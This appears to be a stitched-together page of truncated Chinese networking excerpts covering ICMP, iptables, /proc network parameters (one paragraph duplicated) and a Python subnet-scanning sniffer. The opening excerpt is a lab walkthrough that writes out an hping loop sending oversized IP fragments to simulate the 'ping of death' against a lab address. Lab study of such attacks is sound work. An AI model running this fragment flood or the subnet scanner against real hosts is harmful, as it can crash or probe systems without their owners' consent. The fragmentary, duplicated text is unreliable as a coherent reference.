icmp

需求描述 使用hping构造IP分片， 模拟 实现 死亡 之Ping 环境搭建 使用VMWare和Dynamips。 实现 思路 构造重装后大于65535字节的IP分片 hping 192.168.1.1 -1 -x -d 1400 -N 100 -c 1 for ((i=1;i<50;i++)) do j=`expr $i \* 1408` hping 192.168.1.1 -1 -x -d 1400 -g $j -N 100 -c 1 done hping 192.168.1.1 -1 -d 1000 -g 70400 -N 100 -c 1 实验实施 1. 在PC2上安装Hping源码包 [root@localhost ~]# tar zxf hping2.0.0-rc3.tar.gz [root@localhost ~]# ls anaconda-ks.cfg Desktop hping2.0.0-rc3.tar.gz hping2-rc3 install.log install.log.syslog [root@localhost ~]# mv hping2-rc3/ hping [root@localhost ~]# cd hping [root@localhost hping]# ./configure [root@localhost hping]# make &&

提起TCP/IP，好像大家都能说上几句。从OSI七层模型到TCP三次握手，如果不知道这些面试都不好意跟人打招呼，甚至最近几天老张在开发者头条看到有人在争论TCP到底会不会走向灭亡。 但是，如果问到ICMP是啥又有多少人知道呢？今天老张带大家一分钟了解重要但是被忽略的ICMP协议。 ICMP是啥？ ICMP，全称为Internet Control Message Protocol，即为因特网控制报文协议。 ICMP解决了啥？ IP协议本身即没有为终端系统提供直接的方式来发现那些发往目的地址失败的IP数据包，也没有提供直接的方式来获取诊断信息。而ICMP就是为了解决IP协议的不足引入的网络协议。 ICMP属于TCP/IP四层模型的哪一层？ ICMP既不是网络层协议，也不是传输层协议，但是通常ICMP被认为是IP层的一部分。 ICMP长啥样？ 以ICMP分为ICMPv4和ICMPv6版本，分别对应IPv4协议和IPv6协议。以简单的ICMPv4为例，一条ICMPv4消息分为IPv4头部（20～60字节）、ICMP头部（又分为1字节的类型位、1字节的代码位、2字节的校验和）以及ICMP数据，其中IPv4头部中的协议位数值为1。 一条ICMPv4消息结构 ICMPv4保留了42个不同的类型值，用于含义明确的报文，但是大概只有8个是经常用到的。 ICMP有啥应用？

一．iptables简介 防火墙，其实说白了讲，就是用于实现Linux下访问控制功能的，它分为硬件的或者软件的防火墙两种。无论是在哪个网络中，防火墙工作的地方一定是在网络的边缘。而我们的任务就是需要去定义到底防火墙如何工作，这就是防火墙的策略，规则，以达到让它对出入网络的IP、数据进行检测，它的功能十分强大，使用非常灵活，毫不逊色于一些企业级防火墙。 二．Netfilter、table、chains、policy之间的关系。 Netfilter是table的容器，而table（表）是chains（链）的容器，policy（规则）属于chain（链）。 为了方便读者理解，举个例子：如果把Netfilter比作一栋楼，那么他们的关系如下： 三．iptables的工作原理 匹配规则原理图 防火墙规则的执顺序默认是从前到后，遇到匹配规则（不管是deny或者accept）后就不再往下检查，如果遇到不到匹配的规则会继续向下检查直到遇到匹配规则为止，若检查完所有规则还没有匹配就会使用默认规则进行匹配。 iptable表和链的对应关系 防火墙默认使用的是Fileter表，负责过滤本机流入、流出的数据包 INPUT：负责过滤所有目标地址是本机地址的数据包 FORWARD：负责转发流经本机但不进入本机的数据包，起转发的作用 OUTPUT：处理所有从本机发出去的数据包。 PROWARD

网络嗅探 嗅探目标：基于UDP发现目标网络存活的主机 嗅探基础：当发送一个UDP数据包到主机上的某个关闭端口时，目标主机返回ICMP包指示目标端口不可达，证明目标主机存活，否则证明目标主机不存在 import socket import os import struct import threading import time #导入netaddr包处理子网ip地址 from netaddr import IPNetwork,IPAdress from ctypes import * #扫描主机号 host="192.168.65.133" #扫描子网号 subnet="192.168.65.0/24" magic_message="PYTHONRULES" def udp_sender(subnet,magic_message): time.sleep(5) sender=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) for ip in IPNetwork(subnet): try: #发送数据到子网内所有主机 sender.sendto(magic_message,("%s" % ip,65212)) except: pass #对Ip数据报报头进行解析 class IP(Structure): _fields_=[ ("ihl

/proc/sys/net/ipv4/icmp_timeexceed_rate 这个在traceroute时导致著名的“Solaris middle star”。这个文件控制发送ICMP Time Exceeded消息的比率。 /proc/sys/net/ipv4/igmp_max_memberships 主机上最多有多少个igmp (多播)套接字进行监听。 /proc/sys/net/ipv4/inet_peer_gc_maxtime 求 助: Add a little explanation about the inet peer storage? Minimum interval between garbage collection passes. This interval is in effect under low (or absent) memory pressure on the pool. Measured in jiffies. /proc/sys/net/ipv4/inet_peer_gc_mintime 每一遍碎片收集之间的最小时间间隔。当内存压力比较大的时候，调整这个间隔很有效。以jiffies计。 /proc/sys/net/ipv4/inet_peer_maxttl entries的最大生存期。在pool没有内存压力的情况下(比如

/proc/sys/net/ipv4/icmp_timeexceed_rate 这个在traceroute时导致著名的“Solaris middle star”。这个文件控制发送ICMP Time Exceeded消息的比率。 /proc/sys/net/ipv4/igmp_max_memberships 主机上最多有多少个igmp (多播)套接字进行监听。 /proc/sys/net/ipv4/inet_peer_gc_maxtime 求 助: Add a little explanation about the inet peer storage? Minimum interval between garbage collection passes. This interval is in effect under low (or absent) memory pressure on the pool. Measured in jiffies. /proc/sys/net/ipv4/inet_peer_gc_mintime 每一遍碎片收集之间的最小时间间隔。当内存压力比较大的时候，调整这个间隔很有效。以jiffies计。 /proc/sys/net/ipv4/inet_peer_maxttl entries的最大生存期。在pool没有内存压力的情况下(比如

前言 Internet控制报文协议ICMP（Internet Control Message Protocol）是网络层的一个重要协议。ICMP协议用来在网络设备间传递 各种差错 和 控制信息 ，它对于收集各种网络信息、诊断和排除各种网络故障具有至关重要的作用。使用基于ICMP的应用时，需要对ICMP的工作原理非常熟悉。 icmp重定向 如下图所示，主机A访问服务器A，结果主机A设置的网关确是路由器B(服务器A所对应的路由器A可能是作为备选网关，所以没有先走路由器A)，路由器B就会发给主机A一个icmp重定向的数据包，主机收到数据包就会根据重定向找到正确的路由。所以icmp重定向常用于纠正 网络访问错误 ICMP数据包格式 整个报文就42字节，需要强调的也就是不同的type+code的具有不同含义，如下图: 这里需要区别的就是 网络不可达:路由器没有这个网段的路由，将数据包丢弃，并回复一个网络不可达的数据包 主机不可达：有可达路由，主机却不可访问 协议不可达：网络可达，主机可达，结果不支持这个协议号，故回应协议不可达 端口不可达：网络可达，主机可达，结果主机端口(如HTTP80端口)不可访问，就会回应协议不可达icmp数据包 ping -a 选择特定源地址 -c 指定发的包个数 -t 设置ttl值 Tracert 这也是icmp一个常见的应用，需要了解的就是tracert的工作原理

目录 iptables 1 Firewall：隔离工具 1.1 Packets Filter Firewall 2 iptables/netfilter 2.1 netfilter 2.1 iptables 3 netfilter 3.1 hooks function 4 iptables 4.1 CHAINS：<钩子> 5 报文流向 6 tables 6.1 filter 6.2 nat 6.3 mangle 6.4 raw 6.5 优先级次序（由高而低） 6.6 功能<-->钩子 7 iptables规则的组成部分 7.1 匹配条件 7.2 处理动作： target 8 安装： 8.1 netfilter 8.2 iptables 8.3 程序包： 9 iptables命令 9.1 规则 9.2 匹配条件 9.3 处理动作 9.4 添加规则时需要考量的问题 10 iptabls命令的使用格式 10.1 规则管理格式 11 COMMANDS 链管理 规则 查看 计数器 匹配条件 基本匹配条件： 扩展匹配条件： 显式扩展 12 保存和载入规则 12.1 CentOS 6 12.2 CentOS 7开机自动生效规则 13 规则优化的思路 14 iptables/netfilter网络防火墙 15 NAT 15.1 target: 16 自定义链： 16.1 引用自定义链：